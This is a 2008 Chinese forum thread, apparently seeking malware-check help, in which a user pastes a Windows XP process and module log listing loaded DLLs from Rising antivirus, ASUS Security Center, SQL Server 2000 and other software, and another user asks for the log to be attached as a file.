[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 852 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[c:\program files\asus security center\asus security protect manager\bin\aswlnpkg.dll] [Cognizance Corporation, 2.5.0.077]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[c:\program files\asus security center\asus security protect manager\bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[c:\program files\asus security center\asus security protect manager\bin\aschnl.dll] [Cognizance Corporation, 1.27.0.160]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\BioAuthSrv.dll] [Cognizance Corporation, 2.1.0.083]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItDAC.dll] [Cognizance Corporation, 1.00.317]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItReports.DLL] [Cognizance Corporation, 1.5.0.046]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCServer.dll] [Cognizance Corporation, 1.00.132]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCard.dll] [Cognizance Corporation, 1.01.173]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItMsg.dll] [Cognizance Corporation, 1.21.0.413]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\brand.dll] [ASUSTeK Computer Inc., 1.01.0.014]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\brand.dll] [ASUSTeK Computer Inc., 1.01.0.008]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItAuth.dll] [Cognizance Corporation, 1.01.227]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AuthWiz.dll] [Cognizance Corporation, 2.5.0.558]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\AuthWiz.dll] [Cognizance Corporation, 2.5.0.538]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\NetAdmin.dll] [Cognizance Corporation, 1.5.0.178]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\NetAdmin.dll] [Cognizance Corporation, 1.5.0.177]
[PID: 876 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 936 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1028 / SYSTEM][C:\Program Files\Rising\Rav\CCenter.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.33]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1068 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1152 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1284 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[PID: 1336 / SYSTEM][C:\Program Files\Rising\Rfw\rfwsrv.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.0.76]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rfw\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[C:\Program Files\Rising\Rfw\rfwlog.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.16]
[C:\Program Files\Rising\Rfw\Rfwdrv.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.48]
[C:\Program Files\Rising\Rfw\ijt_ctrl.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\unvdet.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.8]
[C:\Program Files\Rising\Rfw\mPorts.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.6]
[PID: 1468 / SYSTEM][C:\Program Files\Rising\Rfw\rfwProxy.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.0.37]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[C:\Program Files\Rising\Rfw\urlrule.dll] [Beijing Rising Information Technology Co., Ltd., 1.0.0.15]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\MonMid.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.6]
[PID: 1700 / SYSTEM][C:\Program Files\Rising\Rfw\rfwstub.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.0.12]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\Program Files\Rising\Rfw\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 264 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-0852)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\mdimon.dll] [Microsoft Corporation, 11.3.8166.2]
[C:\WINDOWS\system32\tbtmon.dll] [TOSHIBA CORPORATION., 5, 0, 1208, 0]
[C:\WINDOWS\system32\TosBtHcrpAPI.dll] [TOSHIBA CORPORATION., 5, 0, 1201, 0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
rainyblue - 2008-9-2 22:09:00
麻烦日志以附件形式上传……
1234567i - 2008-9-2 22:09:00
[C:\WINDOWS\system32\tbtmon98Language.dll] [TOSHIBA CORPORATION., 5, 0, 1204, 0]
[C:\WINDOWS\System32\spool\PRTPROCS\W32X86\mdippr.dll] [Microsoft Corporation, 11.3.8166.2]
[PID: 1020 / Administrator][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.5512 (xpsp.080413-2105)]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 8.1.0.0]
[C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\PDFShell.CHS] [Adobe Systems, Inc., 8.0.0.0]
[C:\WINDOWS\system32\ieframe.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\WINDOWS\system32\nvcpl.dll] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\NVRSZHC.DLL] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\nvapi.dll] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\nvshell.dll] [, ]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\WINDOWS\system32\WPDShServiceObj.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\PortableDeviceTypes.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\PortableDeviceApi.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\RavExt.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.18]
[D:\Program Files\网络\迅雷5\ComDlls\TDAtOnce_Now.dll] [Thunder Networking Technologies,LTD, 1.0.5.29]
[C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 8.0.0.2006102200]
[D:\Program Files\网络\迅雷5\ComDlls\xunleiBHO_Now.dll] [Thunder Networking Technologies,LTD, 5, 0, 8, 96]
[D:\Program Files\网络\迅雷5\Components\ResWorker\DsBho_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 20]
[D:\Program Files\网络\迅雷5\Components\ResWorker\DataProcessor_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItIEAddIn.dll] [Bioscrypt Inc., 2.1.078]
[C:\Program Files\Microsoft Office\OFFICE11\msohev.dll] [Microsoft Corporation, 11.0.5510]
[C:\Program Files\WinRAR\rarext.dll] [N/A, ]
[D:\Program Files\编程\ultraedit\ue32ctmn.dll] [, 1, 0, 0, 2]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Common Files\Adobe\Shell\PSICON.DLL] [Adobe Systems, Incorporated, 7.0]
[C:\WINDOWS\system32\dfshim.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\system32\mscoree.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Shfusion.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Fusion.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\culture.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\zh-CHS\ShFusRes.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\PROGRA~1\MICROS~3\Wcesview.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\PROGRA~1\MICROS~3\pegconv.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\CEUTIL.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\RAPI.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\wpdshext.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\Audiodev.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\LinkDropHandler.dll] [Altova GmbH, 1, 0, 0, 7]
[C:\WINDOWS\system32\StkCWIA.dll] [Syntek America Inc., 1.0.0.2]
[PID: 1108 / Administrator][C:\Program Files\Rising\Rfw\RfwMain.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.1.70]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rfw\RsGuiLib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rfw\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rfw\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rfw\RfwCtrl.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\RsXML.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[C:\Program Files\Rising\Rfw\PngDll.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[PID: 1304 / SYSTEM][C:\WINDOWS\system32\inetsrv\inetinfo.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-0852)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_filter.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[PID: 1748 / SYSTEM][C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\opends60.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlsort.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\ums.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\Resources\2052\sqlevn70.RLL] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SSNETLIB.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\SSmsLPCn.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\SSnmPN70.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Common Files\System\Ole DB\sqloledb.dll] [Microsoft Corporation, 2000.085.1132.00 (xpsp.080413-0852)]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\xpsqlbot.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\odsole70.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[PID: 196 / Administrator][C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsGHost.exe] [Cognizance Corporation, 2.5.0.057]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWallet.dll] [Bioscrypt Inc., 2.0.0.110]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ASWallet.dll] [Bioscrypt Inc., 2.0.0.110]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItSSO.dll] [Cognizance Corporation, 2.5.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\RasAdmin.dll] [Cognizance Corporation, 1.5.0.028]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItReports.DLL] [Cognizance Corporation, 1.5.0.046]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\RasAdmin.dll] [Cognizance Corporation, 1.5.0.028]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\PkiAdmin.dll] [Cognizance Corporation, 1.5.0.025]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\brand.dll] [ASUSTeK Computer Inc., 1.01.0.014]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\brand.dll] [ASUSTeK Computer Inc., 1.01.0.008]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItMsg.dll] [Cognizance Corporation, 1.21.0.413]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\PkiAdmin.dll] [Cognizance Corporation, 1.5.0.025]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCClient.dll] [Cognizance Corporation, 2.1.0.182]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCard.dll] [Cognizance Corporation, 1.01.173]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItAPS.dll] [Cognizance Corporation, 2.5.0.064]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItAPS.dll] [Cognizance Corporation, 2.5.0.063]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\TrayIcon.dll] [Cognizance Corporation, 2.5.0.285]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\BioAuth.dll] [Cognizance Corporation, 2.5.0.306]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\BioAuth.dll] [Cognizance Corporation, 2.5.0.301]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsChnl.dll] [Cognizance Corporation, 1.27.0.160]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\NetAdmin.dll] [Cognizance Corporation, 1.5.0.178]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\NetAdmin.dll] [Cognizance Corporation, 1.5.0.177]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SSOMngr.dll] [Cognizance Corporation, 2.25.0.293]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SSOMngr.dll] [Cognizance Corporation, 2.25.0.296]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASBioAT.dll] [Cognizance Corporation, 2.5.0.083]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItEncryptedDisk.dll] [Cognizance Corporation, 1.5.0.054]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItEncrypt.dll] [Cognizance Corporation, 1.01.037]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ittal.dll] [Cognizance Corporation, 2.5.0.208]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AuthWiz.dll] [Cognizance Corporation, 2.5.0.558]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\AuthWiz.dll] [Cognizance Corporation, 2.5.0.538]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItDAC.dll] [Cognizance Corporation, 1.00.317]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\ATSC70.dll] [AuthenTec, Inc., 7, 8, 1, 14]
[PID: 584 / SYSTEM][C:\WINDOWS\system32\nvsvc32.exe] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\nvapi.dll] [NVIDIA Corporation, 6.14.11.5680]
[PID: 1684 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 2148 / SYSTEM][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtSrv.exe] [TOSHIBA CORPORATION, 1, 0, 1402, 0]
[PID: 2448 / SYSTEM][C:\Program Files\Microsoft SQL Server\MSSQL\binn\sqlagent.exe] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SQLRESLD.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SQLSVC.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\WINDOWS\system32\odbcbcp.dll] [Microsoft Corporation, 2000.085.1132.00 (xpsp.080413-0852)]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\W95SCM.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SEMMAP.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\SQLSVC.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\SEMMAP.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\sqlagent.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SQLAGENT.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\SQLCMDSS.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\Resources\2052\SQLCMDSS.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\SQLREPSS.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\Resources\2052\SQLREPSS.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\SQLATXSS.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\ATXCORE.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\ATXCORE.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\Resources\2052\SQLATXSS.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\AXSCPHST.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\Resources\2052\AXSCPHST.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\WINDOWS\system32\SQLSRV32.dll] [Microsoft Corporation, 2000.085.1132.00 (xpsp.080413-0852)]
[C:\WINDOWS\system32\sqlsrv32.rll] [Microsoft Corporation, 2000.085.1117.00 built by: (_sqlbld)]
[C:\WINDOWS\system32\DBmsLPCn.dll] [Microsoft Corporation, 2000.080.2039.00]
1234567i - 2008-9-2 22:09:00
[PID: 2852 / LOCAL SERVICE][C:\WINDOWS\System32\SCardSvr.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[PID: 2936 / Administrator][C:\WINDOWS\ATK0100\HControl.exe] [, 1043, 2, 15, 65]
[C:\WINDOWS\ATK0100\CMSSC.dll] [N/A, ]
[C:\WINDOWS\ATK0100\inter_f2.dll] [ATK, 1043, 2, 15, 52]
[C:\WINDOWS\ATK0100\ATKWLIOC.DLL] [ACTIONTEC Electronics,Inc, 2.01.02]
[C:\WINDOWS\ATK0100\SiSPkt.dll] [Silicon Integrated Systems Corp., 1, 0, 0, 45]
